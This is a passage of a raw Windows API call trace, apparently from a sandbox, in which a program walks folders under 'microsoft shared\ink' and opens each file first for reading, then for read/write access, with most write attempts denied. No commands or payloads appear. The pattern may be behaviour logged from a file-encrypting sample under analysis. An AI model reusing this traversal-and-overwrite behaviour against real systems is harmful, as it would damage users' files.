lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0085.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0085.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.021] AreFileApisANSI () returned 1 [0085.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR", lpUsedDefaultChar=0x0) returned 57 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0085.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0085.021] AreFileApisANSI () returned 1 [0085.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0085.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR") returned 57 [0085.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.022] GetLastError () returned 0x5 [0085.022] GetLastError () returned 0x5 [0085.022] SetLastError (dwErrCode=0x5) [0085.022] GetLastError () returned 0x5 [0085.022] SetLastError (dwErrCode=0x5) [0085.022] GetLastError () returned 0x5 [0085.022] SetLastError (dwErrCode=0x5) [0085.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.022] AreFileApisANSI () returned 1 [0085.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR") returned 57 [0085.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.022] GetLastError () returned 0x5 [0085.022] GetLastError () returned 0x5 [0085.022] SetLastError (dwErrCode=0x5) [0085.022] GetLastError () returned 0x5 [0085.022] SetLastError (dwErrCode=0x5) [0085.022] GetLastError () returned 0x5 [0085.022] SetLastError (dwErrCode=0x5) [0085.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0085.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0085.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0085.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0085.023] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LanguageModel", cAlternateFileName="LANGUA~1")) returned 1 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0085.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0085.033] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0085.034] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.034] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x80a30 [0085.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0085.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0085.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0085.035] AreFileApisANSI () returned 1 [0085.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0085.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0085.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0085.035] AreFileApisANSI () returned 1 [0085.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0085.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui") returned 73 [0085.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.036] GetFileType (hFile=0x424) returned 0x1 [0085.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0085.036] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.036] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.036] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.036] CloseHandle (hObject=0x424) returned 1 [0085.036] AreFileApisANSI () returned 1 [0085.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85580 [0085.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui") returned 73 [0085.037] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.037] GetLastError () returned 0x5 [0085.037] GetLastError () returned 0x5 [0085.037] SetLastError (dwErrCode=0x5) [0085.037] GetLastError () returned 0x5 [0085.037] SetLastError (dwErrCode=0x5) [0085.037] GetLastError () returned 0x5 [0085.037] SetLastError (dwErrCode=0x5) [0085.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0085.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0085.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.037] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓Ḁ")) returned 0 [0085.037] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0085.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0085.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0085.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0085.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.038] AreFileApisANSI () returned 1 [0085.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel", lpUsedDefaultChar=0x0) returned 65 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0085.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0085.039] AreFileApisANSI () returned 1 [0085.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0085.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82208 [0085.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel") returned 65 [0085.039] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.039] GetLastError () returned 0x5 [0085.039] GetLastError () returned 0x5 [0085.039] SetLastError (dwErrCode=0x5) [0085.039] GetLastError () returned 0x5 [0085.039] SetLastError (dwErrCode=0x5) [0085.039] GetLastError () returned 0x5 [0085.039] SetLastError (dwErrCode=0x5) [0085.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0085.039] AreFileApisANSI () returned 1 [0085.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0085.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82cb8 [0085.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x82cb8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel") returned 65 [0085.039] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.040] GetLastError () returned 0x5 [0085.040] GetLastError () returned 0x5 [0085.040] SetLastError (dwErrCode=0x5) [0085.040] GetLastError () returned 0x5 [0085.040] SetLastError (dwErrCode=0x5) [0085.040] GetLastError () returned 0x5 [0085.040] SetLastError (dwErrCode=0x5) [0085.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82cb8 | out: hHeap=0x20000) returned 1 [0085.040] HeapFree (in: 